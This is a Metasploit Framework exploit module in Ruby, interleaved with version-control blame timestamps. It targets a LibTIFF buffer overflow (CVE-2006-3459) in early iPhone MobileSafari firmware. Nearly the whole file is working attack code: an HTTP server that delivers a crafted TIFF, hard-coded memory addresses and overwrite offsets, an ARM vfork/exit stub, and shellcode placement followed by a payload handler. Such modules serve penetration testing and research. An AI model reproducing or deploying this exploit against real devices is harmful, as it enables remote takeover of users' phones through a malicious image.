2007-10-14 22:15:41 +00:00
|
|
|
##
|
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-10-14 22:15:41 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-10-14 22:15:41 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = GoodRanking
|
2007-10-14 22:15:41 +00:00
|
|
|
|
|
|
|
#
|
|
|
|
# This module acts as an HTTP server
|
|
|
|
#
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
2007-10-14 22:15:41 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'iPhone MobileSafari LibTIFF Buffer Overflow',
|
|
|
|
'Description' => %q{
|
2010-04-30 08:40:19 +00:00
|
|
|
This module exploits a buffer overflow in the version of
|
|
|
|
libtiff shipped with firmware versions 1.00, 1.01, 1.02, and
|
|
|
|
1.1.1 of the Apple iPhone. iPhones which have not had the BSD
|
|
|
|
tools installed will need to use a special payload.
|
2007-10-14 22:15:41 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2009-09-27 21:30:45 +00:00
|
|
|
'Author' => ['hdm', 'kf'],
|
2007-10-14 22:15:41 +00:00
|
|
|
'Version' => '$Revision$',
|
2010-04-30 08:40:19 +00:00
|
|
|
'References' =>
|
2007-10-14 22:15:41 +00:00
|
|
|
[
|
2010-09-20 08:06:27 +00:00
|
|
|
['CVE', '2006-3459'],
|
2007-10-14 22:15:41 +00:00
|
|
|
['OSVDB', '27723'],
|
|
|
|
['BID', '19283']
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
2007-10-16 06:15:10 +00:00
|
|
|
'Space' => 1800,
|
2007-10-14 22:15:41 +00:00
|
|
|
'BadChars' => "",
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-14 22:15:41 +00:00
|
|
|
# Multi-threaded applications are not allowed to execve() on OS X
|
|
|
|
# This stub injects a vfork/exit in front of the payload
|
|
|
|
'Prepend' =>
|
|
|
|
[
|
|
|
|
0xe3a0c042, # vfork
|
|
|
|
0xef000080, # sc
|
|
|
|
0xe3500000, # cmp r0, #0
|
|
|
|
0x1a000001, # bne
|
|
|
|
0xe3a0c001, # exit(0)
|
|
|
|
0xef000080 # sc
|
|
|
|
].pack("V*")
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
[ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',
|
2007-10-15 03:15:21 +00:00
|
|
|
{
|
|
|
|
'Platform' => 'osx',
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-16 05:29:13 +00:00
|
|
|
# Scratch space for our shellcode and stack
|
|
|
|
'Heap' => 0x00802000,
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-16 05:29:13 +00:00
|
|
|
# Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib
|
2010-04-30 08:40:19 +00:00
|
|
|
'Magic' => 0x300d562c,
|
2007-10-15 03:15:21 +00:00
|
|
|
}
|
2010-04-30 08:40:19 +00:00
|
|
|
],
|
2007-10-14 22:15:41 +00:00
|
|
|
],
|
2007-10-15 21:00:10 +00:00
|
|
|
'DefaultTarget' => 0,
|
2007-10-14 22:15:41 +00:00
|
|
|
'DisclosureDate' => 'Aug 01 2006'
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
2007-10-15 21:00:10 +00:00
|
|
|
def on_request_uri(cli, req)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
|
2007-10-14 22:15:41 +00:00
|
|
|
# Re-generate the payload
|
|
|
|
return if ((p = regenerate_payload(cli)) == nil)
|
|
|
|
|
2007-10-16 05:29:13 +00:00
|
|
|
# Grab reference to the target
|
2007-10-15 21:00:10 +00:00
|
|
|
t = target
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2008-07-01 01:44:56 +00:00
|
|
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
2007-10-14 22:15:41 +00:00
|
|
|
|
|
|
|
# Transmit the compressed response to the client
|
2007-10-15 21:00:10 +00:00
|
|
|
send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-14 22:15:41 +00:00
|
|
|
# Handle the payload
|
|
|
|
handler(cli)
|
|
|
|
end
|
|
|
|
|
2007-10-15 21:00:10 +00:00
|
|
|
def generate_tiff(code, targ)
|
2007-10-14 22:15:41 +00:00
|
|
|
|
|
|
|
#
|
2007-10-16 05:29:13 +00:00
|
|
|
# This is a TIFF file, we have a huge range of evasion
|
|
|
|
# capabilities, but for now, we don't use them.
|
|
|
|
# - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday
|
2007-10-14 22:15:41 +00:00
|
|
|
#
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-16 06:15:10 +00:00
|
|
|
lolz = 2048
|
2010-04-30 08:40:19 +00:00
|
|
|
tiff =
|
2007-10-16 05:29:13 +00:00
|
|
|
"\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+
|
|
|
|
"\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+
|
|
|
|
"\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+
|
|
|
|
"\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+
|
|
|
|
"\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+
|
|
|
|
"\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+
|
|
|
|
"\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+
|
|
|
|
"\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+
|
2007-10-16 05:40:36 +00:00
|
|
|
[lolz].pack("V") +
|
2007-10-16 05:29:13 +00:00
|
|
|
"\x84\x00\x00\x00\x00\x00\x00\x00"
|
|
|
|
|
|
|
|
# Randomize the bajeezus out of our data
|
2007-10-16 05:40:36 +00:00
|
|
|
hehe = rand_text(lolz)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-16 05:29:13 +00:00
|
|
|
# Were going to candy mountain!
|
2007-10-16 06:32:55 +00:00
|
|
|
hehe[120, 4] = [targ['Magic']].pack("V")
|
2007-10-16 05:29:13 +00:00
|
|
|
|
|
|
|
# >> add r0, r4, #0x30
|
2007-10-16 05:40:36 +00:00
|
|
|
hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")
|
2007-10-16 05:29:13 +00:00
|
|
|
|
|
|
|
# Candy mountain, Charlie!
|
|
|
|
# >> mov r1, sp
|
|
|
|
|
|
|
|
# It will be an adventure!
|
|
|
|
# >> mov r2, r8
|
2007-10-16 05:40:36 +00:00
|
|
|
hehe[ 92, 4] = [ hehe.length ].pack("V")
|
2007-10-16 05:29:13 +00:00
|
|
|
|
|
|
|
# Its a magic leoplurodon!
|
|
|
|
# It has spoken!
|
|
|
|
# It has shown us the way!
|
|
|
|
# >> bl _memcpy
|
|
|
|
|
|
|
|
# Its just over this bridge, Charlie!
|
|
|
|
# This magical bridge!
|
|
|
|
# >> ldr r3, [r4, #32]
|
|
|
|
# >> ldrt r3, [pc], r3, lsr #30
|
|
|
|
# >> str r3, [r4, #32]
|
|
|
|
# >> ldr r3, [r4, #36]
|
|
|
|
# >> ldrt r3, [pc], r3, lsr #30
|
|
|
|
# >> str r3, [r4, #36]
|
|
|
|
# >> ldr r3, [r4, #40]
|
|
|
|
# >> ldrt r3, [pc], r3, lsr #30
|
|
|
|
# >> str r3, [r4, #40]
|
|
|
|
# >> ldr r3, [r4, #44]
|
|
|
|
# >> ldrt r3, [pc], r3, lsr #30
|
|
|
|
# >> str r3, [r4, #44]
|
|
|
|
|
|
|
|
# We made it to candy mountain!
|
|
|
|
# Go inside Charlie!
|
2010-04-30 08:40:19 +00:00
|
|
|
# sub sp, r7, #0x14
|
2007-10-16 05:40:36 +00:00
|
|
|
hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")
|
2007-10-16 05:29:13 +00:00
|
|
|
|
|
|
|
# Goodbye Charlie!
|
|
|
|
# ;; targ['Heap'] + 0x48 becomes the stack pointer
|
|
|
|
# >> ldmia sp!, {r8, r10}
|
|
|
|
|
|
|
|
# Hey, what the...!
|
|
|
|
# >> ldmia sp!, {r4, r5, r6, r7, pc}
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-16 05:29:13 +00:00
|
|
|
# Return back to the copied heap data
|
2007-10-16 05:40:36 +00:00
|
|
|
hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-16 05:29:13 +00:00
|
|
|
# Insert our actual shellcode at heap location + 196
|
2007-10-16 05:40:36 +00:00
|
|
|
hehe[196, payload.encoded.length] = payload.encoded
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2007-10-16 05:40:36 +00:00
|
|
|
tiff << hehe
|
2007-10-14 22:15:41 +00:00
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2009-09-27 21:30:45 +00:00
|
|
|
end
|